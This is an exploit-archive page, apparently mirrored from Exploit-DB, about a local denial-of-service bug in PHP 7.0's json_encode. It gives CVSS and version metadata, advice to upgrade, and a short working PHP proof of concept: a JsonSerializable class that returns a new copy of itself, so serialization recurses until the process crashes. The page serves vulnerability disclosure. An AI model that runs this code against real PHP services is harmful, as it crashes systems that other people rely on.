header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
7,5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2012 R2 64bit, English
2016

PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service

A vulnerability in PHP 7.0 JsonSerializable::jsonSerialize json_encode can be exploited to cause a Local Denial of Service. The bug was discovered by Yakir Wizman and affects Windows Server 2012 R2 64bit, English, PHP 7.0.

Mitigation:

Upgrade to the latest version of PHP 7.0
Source

Exploit-DB raw data:

<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
json_encode(new jsonTmp());
?>

Navigation

Suggest Exploit

Services By CQR